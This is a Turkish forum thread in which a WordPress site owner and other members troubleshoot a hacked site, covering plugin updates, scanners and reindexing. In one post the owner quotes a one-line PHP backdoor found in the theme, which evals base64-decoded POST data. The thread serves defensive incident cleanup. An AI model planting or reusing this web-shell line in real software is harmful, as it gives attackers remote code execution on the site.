• 16-01-2015, 10:08:36
    #10
    CND adlı üyeden alıntı: mesajı görüntüle
    Birkaç yabancı kaynakta aradım, genelde tarayıcınızdan kaynaklı olabilir demişler ama gün içinde ofise geçtiğimde tekrar deneyeceğim, pm atarım
    hocam kaynak kodlarına bakın. header bölümünde js kodu eklenmiştir muhtemelen. Aynı şey şu anda bir arkadaşın sitesinde de mevcut.

    kaynak kodlarında şöyle birşey var
    <!-- <script type="text/javascript">document.getElementById("1m8sx6").style.display='none';</script> -->
    Bu sorun nasıl oluşuyor bilmiyorum. Bilen varsa bi yol yöntem gösterirse çok mutlu olurum
  • 16-01-2015, 10:24:10
    #11
    O şekilde bir kod bulamadım. @MimariuS;

    Açıklaması yabancı görülen bir sayfaya girdim,

    Bu 2 kod var sadece,

     var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
     var s = document.getElementsByTagName('script')[0];
    Bunlar da analytics ve google font bölümlerinde.

    Ya temada açık var ya da seo eklentisinde
  • 16-01-2015, 10:27:11
    #12
    Js ile hackliyorlar. SQL satırlarını temizlemeli ve soruna sebep olan eklenti yada temayı kaldırmalısınız.

    Base64 ile hack ve çözümü hakkında bilg ialmak için google 'a

    siteniz şüpheliler listesinde mi ?

    diye yazıp aratın. bir makale yazmıştım. kafanıza takılan bir şey olursa yorum olarakta sorabilirsiniz.

    Veya https://www.r10.net/google-optimizasy...-icerik-7.html konusunu açmıştım bakabilirsiniz.
  • 16-01-2015, 10:34:04
    #13
    celilcan adlı üyeden alıntı: mesajı görüntüle
    Js ile hackliyorlar. SQL satırlarını temizlemeli ve soruna sebep olan eklenti yada temayı kaldırmalısınız.

    Base64 ile hack ve çözümü hakkında bilg ialmak için google 'a

    siteniz şüpheliler listesinde mi ?

    diye yazıp aratın. bir makale yazmıştım. kafanıza takılan bir şey olursa yorum olarakta sorabilirsiniz.

    Veya https://www.r10.net/google-optimizasy...-icerik-7.html konusunu açmıştım bakabilirsiniz.
    Alıntı
    Bu site, aracılık yaparak kötü amaçlı yazılımın daha fazla yayılmasına yol açtı mı?
    xxx, son 90 gündür herhangi bir siteye kötü amaçlı yazılım yüklenmesi için aracılık yapıyormuş gibi görünmüyor.

    Bu site kötü amaçlı yazılımı nasıl barındırdı?
    Hayır. Bu site, son 90 gün içinde kötü amaçlı yazılım barındırmadı.
    Tek tek tüm js'leri kontrol mu etmem gerekiyor? grepWin olayını bir deneyeyim siteyi indirip.
  • 16-01-2015, 10:35:34
    #14
    CND adlı üyeden alıntı: mesajı görüntüle
    O şekilde bir kod bulamadım. @MimariuS;

    Açıklaması yabancı görülen bir sayfaya girdim,

    Bu 2 kod var sadece,

     var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
     var s = document.getElementsByTagName('script')[0];
    Bunlar da analytics ve google font bölümlerinde.

    Ya temada açık var ya da seo eklentisinde
    Site adresini pm atabilir misin hocam
  • 16-01-2015, 10:51:32
    #15
    Sanırım çözdüm, sitedeki w3 Cache eklentisi çok eskiydi, güncelleme notunu görmemişim. Güncelleme notunda 20+ güvenlik açığı kapatıldı şeklinde detaylı bilgiler var. Şimdi eklentiyi güncelledim, sıra sitedeki kodları bulup temizlemeye geldi halletmeye çalışıyorum, olmazsa pm atarım teşekkürler @MimariuS;
  • 16-01-2015, 10:53:24
    #16
    CND adlı üyeden alıntı: mesajı görüntüle
    Sanırım çözdüm, sitedeki w3 Cache eklentisi çok eskiydi, güncelleme notunu görmemişim. Güncelleme notunda 20+ güvenlik açığı kapatıldı şeklinde detaylı bilgiler var. Şimdi eklentiyi güncelledim, sıra sitedeki kodları bulup temizlemeye geldi halletmeye çalışıyorum, olmazsa pm atarım teşekkürler @MimariuS;
    inşallah çözülür hocam. Araştırırken Exploit Scanner diye bi eklentiye denk geldim. Bu eklentiyi de bi araştırıp sunucu taraması yapabilirsin hocam.
  • 16-01-2015, 11:20:16
    #17
    MimariuS adlı üyeden alıntı: mesajı görüntüle
    inşallah çözülür hocam. Araştırırken Exploit Scanner diye bi eklentiye denk geldim. Bu eklentiyi de bi araştırıp sunucu taraması yapabilirsin hocam.
    Onu da deniyorum, wp'nin kendi eklentileriyle de aratıyorum henüz virüs vb. bir şey çıkmadı... Tüm eklentileri ve temayı güncelleştirdim, wp'yi de yükselttim son sürüme.

    Bu yabancı açıklaması olan sayfaları toplu şekilde tekrar indexlenmesi için google'a nasıl bildirebiliriz? Açıklamaları manuel olarak girmek çok uğraştıracak. Sağol yardımların için.

    --R10.NET; Flood Engellendi -->-> Yeni yazılan mesaj 11:20:16 -->-> Daha önceki mesaj 11:13:15 --

    Temanın içinde 2 tane garip kod buldu uygulama.

    Alıntı
    <?php if(isset($_POST["cspdnbtxql"])){@eval(base64_decode($_POST["cspdnbtxql"]));die();}?><?php get_header(); ?>
    Alıntı
    $imgData = base64_decode("R0lGODlhUAAMAIAAAP8AAP///yH5BAAHAP8ALAAAAABQAAwAAAJpjI+py+0Po5y0OgAMjjv01YU Z\nOGplhWXfNa6JCLnWkXplrcBmW+spbwvaVr/cDyg7IoFC2KbYVC2NQ5MQ4ZNao9Ynzjl9ScNYpneb\nDULB3RP 6JuPuaGfuuV4fumf8PuvqFyhYtjdoeFgAADs=");
    2 sini de çözemedim, @celilcan; @MimariuS; bunlar bir sorun teşkil eder mi sizce? Teşekkürler
  • 16-01-2015, 11:35:32
    #18
    CND adlı üyeden alıntı: mesajı görüntüle
    Onu da deniyorum, wp'nin kendi eklentileriyle de aratıyorum henüz virüs vb. bir şey çıkmadı... Tüm eklentileri ve temayı güncelleştirdim, wp'yi de yükselttim son sürüme.

    Bu yabancı açıklaması olan sayfaları toplu şekilde tekrar indexlenmesi için google'a nasıl bildirebiliriz? Açıklamaları manuel olarak girmek çok uğraştıracak. Sağol yardımların için.

    --R10.NET; Flood Engellendi -->-> Yeni yazılan mesaj 11:20:16 -->-> Daha önceki mesaj 11:13:15 --

    Temanın içinde 2 tane garip kod buldu uygulama.





    2 sini de çözemedim, @celilcan; @MimariuS; bunlar bir sorun teşkil eder mi sizce? Teşekkürler
    Timthumb içindemiydi bu encode edilmiş veri ?